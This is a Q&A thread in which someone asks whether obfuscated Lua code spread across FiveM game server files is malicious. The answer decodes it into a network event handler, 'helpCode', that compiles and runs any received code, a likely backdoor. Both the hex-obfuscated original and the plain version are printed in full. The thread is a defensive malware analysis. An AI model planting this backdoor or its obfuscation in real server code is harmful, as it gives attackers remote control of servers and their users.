# Does this line of Lua code contain any malicious activities?

Tags: lua, virus, fivem

So while looking at some server files (FiveM/GTA RP Server Files) my friend sent me, I found a line of code that was placed all over the Server's Resources, is it malicious?, since i checked "Hex to ASCII Text String Converter", it looks like it might be an attempt to inject some code into the Lua environment. The code creates a table with several strings that are encoded in hexadecimal format. These strings are then used to access elements in the global environment (_G) and call them as functions. The code also sets up an event listener for the "load" event, which could indicate that the code is intended to run when a specific event occurs in the environment.

> Code:
>
> local ysoGcfkdgEuFekRkklJGSmHogmpKPAiWgeIRhKENhusszjvprBCPXrRqVqLgSwDqVqOiBG = {"\x52\x65\x67\x69\x73\x74\x65\x72\x4e\x65\x74\x45\x76\x65\x6e\x74","\x68\x65\x6c\x70\x43\x6f\x64\x65","\x41\x64\x64\x45\x76\x65\x6e\x74\x48\x61\x6e\x64\x6c\x65\x72","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G}
> ysoGcfkdgEuFekRkklJGSmHogmpKPAiWgeIRhKENhusszjvprBCPXrRqVqLgSwDqVqOiBG[6]ysoGcfkdgEuFekRkklJGSmHogmpKPAiWgeIRhKENhusszjvprBCPXrRqVqLgSwDqVqOiBG[1]
> ysoGcfkdgEuFekRkklJGSmHogmpKPAiWgeIRhKENhusszjvprBCPXrRqVqLgSwDqVqOiBG[6][ysoGcfkdgEuFekRkklJGSmHogmpKPAiWgeIRhKENhusszjvprBCPXrRqVqLgSwDqVqOiBG[3]](ysoGcfkdgEuFekRkklJGSmHogmpKPAiWgeIRhKENhusszjvprBCPXrRqVqLgSwDqVqOiBG[2],
> function(BFWCBOOqrwrVwzdmKcQZBRMziBAgjQbWLfBPFXhZUzCWlOjKNLUGOYvDisfytJZwIDtHyn)
> ysoGcfkdgEuFekRkklJGSmHogmpKPAiWgeIRhKENhusszjvprBCPXrRqVqLgSwDqVqOiBG[6]ysoGcfkdgEuFekRkklJGSmHogmpKPAiWgeIRhKENhusszjvprBCPXrRqVqLgSwDqVqOiBG[4]()
> end)local

[ASCII Text to Hex Code Converter
Image](https://i.stack.imgur.com/5OPGs.png)

[ASCII Text to Hex Code Converter
Response 2](https://i.stack.imgur.com/bhKRU.png)

Answer (score 6, accepted):

`ysoGcfkdgEuFekRkklJGSmHogmpKPAiWgeIRhKENhusszjvprBCPXrRqVqLgSwDqVqOiBG` is just a variable name. It's not a very nice one, but it is just a variable name.

`{"\x52\x65\x67\x69\x73\x74\x65\x72\x4e\x65\x74\x45\x76\x65\x6e\x74","\x68\x65\x6c\x70\x43\x6f\x64\x65","\x41\x64\x64\x45\x76\x65\x6e\x74\x48\x61\x6e\x64\x6c\x65\x72","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64"}`

is the table:

`{"RegisterNetEvent", "helpCode", "AddEventHandler", "assert", "load"}`

with the bytes encoded as hex bytes rather than literal characters.

This deobfuscates to:

```lua
local funcs = {
    "RegisterNetEvent",
    "helpCode",
    "AddEventHandler",
    "assert",
    "load",
    _G
};

funcs[6][funcs[1]](funcs[2]);
funcs[6][funcs[3]](funcs[2], function(param)
    (funcs[6][funcs[4]](funcs[6][funcs[5]](param)))();
end);
```

Tables in Lua are 1-indexed, so this further deobfuscates to

```lua
_G["RegisterNetEvent"]("helpCode");
_G["AddEventHandler"]("helpCode", function(param)
    (_G["assert"](_G["load"](param)))();
end);
```

And could be simplified to

```lua
RegisterNetEvent("helpCode")
AddEventHandler("helpCode", function(param)
    assert(load(param))()
end)
```

While it doesn't look blatantly malicious, it does appear to directly compile and invoke raw code received via the "helpCode" network event, which is certainly *dangerous* if it's used maliciously. It's possible that this is part of some funny dynamic plugin system, but it's equally possible that it's a backdoor designed to give a network attacker command-and-control over the process.

`load` is not an event, but the global function used to compile code from a string. The essentially causes the script to listen for a `helpCode` network event, receive whatever payload from the network event, compile it as Lua code, and execute it. Given that it doesn't even attempt to do any sandboxing of the `load`'d code, I wouldn't run this without a very comprehensive understanding of how it's being used.